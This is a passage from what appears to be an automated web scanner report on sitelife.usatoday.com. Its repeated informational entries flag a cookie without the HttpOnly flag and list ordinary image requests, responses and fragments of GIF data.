Accept-Ranges: bytes
ETag: "209dc8f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:52 GMT
Connection: close

.PNG
.
...IHDR..............L_.....tEXtSoftware.Adobe ImageReadyq.e<...ZIDATx.tQ.JBA.=3.7$...=(......hQH....h.......6.I.P[w."Zd..LA....z......:.....g....;...A*iq..)W...Z.l#}i..6..sX.....aN...i.ABa.
...[SNIP]...

16.150. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-report-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 587
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "62f23bf4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:42 GMT
Connection: close

GIF89a........................N..Q..R..T..T..U..V..X..W..W..W..Z..X..\..[..\..\..\..]..^..d...............................................P..X..b....................W.....B..U..]..y...................
...[SNIP]...

16.151. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/abuse/pluck-abuse-reported-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 607
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "89039f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

GIF89a.....Y...........kk...................AA.]].33...................ii................[[..........ss...................ee....??..........QQ.WW.==.UU.//..........##...................aa.ww.......OO.
...[SNIP]...

16.152. http://sitelife.usatoday.com/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/reactions/score/pluck-thumb-up-grayed.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 229
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:19 GMT
Accept-Ranges: bytes
ETag: "d8a24cf4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:42 GMT
Connection: close

GIF89a.......................................................................................................!.......,..........b &.W9..e........u.e>.H...Y.RJ..GWeAP8.:S%@XX...r@`x.`...G...z.v(...|N
...[SNIP]...

16.153. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/throbber.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; SiteLifeHost=gnvm4l3pluckcom; USATINFO=Handle%3D; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 3951
Content-Type: image/gif
Last-Modified: Thu, 04 Nov 2010 22:01:56 GMT
Accept-Ranges: bytes
ETag: "8687ae56b7ccb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:42 GMT
Connection: close

GIF89a.....................N.........!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,................=.....|...7........YI....k.......@.N.#..6Z.vd.tE'.y.V.J.49...W.5.]...oY.^..j..,g..>......
...[SNIP]...

16.154. http://sitelife.usatoday.com/ver1.0/Content/ua/images/throbber_circle.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/throbber_circle.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/throbber_circle.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 1849
Content-Type: image/gif
Last-Modified: Thu, 04 Nov 2010 22:01:55 GMT
Accept-Ranges: bytes
ETag: "9fd4e3e46b7ccb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:44 GMT
Connection: close

GIF89a......................FFFzzz...XXX$$$...............666hhh.............................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!..
...,..........w .. !...DB..A..H.....
...[SNIP]...

16.155. http://sitelife.usatoday.com/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/users/pluck-recommend-user-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 339
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:18 GMT
Accept-Ranges: bytes
ETag: "b8e68df3917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:42 GMT
Connection: close

GIF89a........................................................................].............. ..).......................................................................................................
...[SNIP]...

16.156. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/email/pluck-email-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/email/pluck-email-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 253
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "5eb1bcf4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a.............................................................|||zzzxxxuuuqqqooollliiieee```]]].........!.......,..........z`..dY.A.......40.@P.......l#.H$..p.9.&.Ub.K.(..A!.(..J%0(G..."R..,.@..D
...[SNIP]...

16.157. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/permalink/pluck-permalink-icon.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 211
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "ccb29df4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:50 GMT
Connection: close

GIF89a.............cb]`_Z~}x..~.....................III>>>000,,,###..........................................!.......,..........P.%.di.h...X4pS.o<.Np..C.:...x<....X.(".Hp..... C".P.. w+.,..EEP>....en.
...[SNIP]...

16.158. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-buzz.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 391
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:51 GMT
Connection: close

GIF89a.................Ziq9Q.......l......j...........
..N.....,..f..u..Q.....p....a*U8'........y..........mm...........................................................................................
...[SNIP]...

16.159. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-delicious.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 106
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "508ab5f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a...............................!.......,........../H...P..b..>.....9.....................=...$.q...;

16.160. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-digg.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 137
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "f627b3f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a...............................!.......,..........Nx...%F...uQ.....}Ft.BY.Czxm.n-AY.1..a.....S.@.......#X..Q....r. f.4J...........;

16.161. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-fb.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-fb.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 345
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a.............)>k=Z.`x.bz.d{.k..Te.h}.Td.t........;Y.)>j<Z.Mi.Tn.F[.FZ.d|.Tf.k..l..Tf.l..j.i~.w...................................................................................................
...[SNIP]...

16.162. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-ff.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-ff.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 173
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a.............C~....S..d..U........q..t.................!.......,..........Zp.Ik.(......".PT.bX.@.D.N.|. X.G>P........CL..)`..2.3-[..k....RYu7......L;.N...=8..-..._D..;

16.163. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/ua/images/util/share/pluck-share-linkedin.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=81fbd51d-fba0-4197-b3aa-e38ae226cac6; s_cc=true; s_lastvisit=1305508813603; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Ftravel%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=; USATINFO=Handle%3D; SiteLifeHost=gnvm4l3pluckcom; usatprod=R1449728009

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449728009; path=/
Content-Length: 172
Content-Type: image/gif
Last-Modified: Tue, 02 Nov 2010 13:29:20 GMT
Accept-Ranges: bytes
ETag: "aaecb7f4917acb1:2af"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:20:49 GMT
Connection: close

GIF89a......................D......T..].`....................!.......,..........Y..D..2..;.^.i.!....F..G."&...!.H!...n.8(..U. L...F!.(.....i.q......~.FBl.K...x,(w!..\=....;

16.164. http://sitelife.usatoday.com/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Content/ua/images/util/share/pluck-share-myspace.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod=R1449728009; path=/

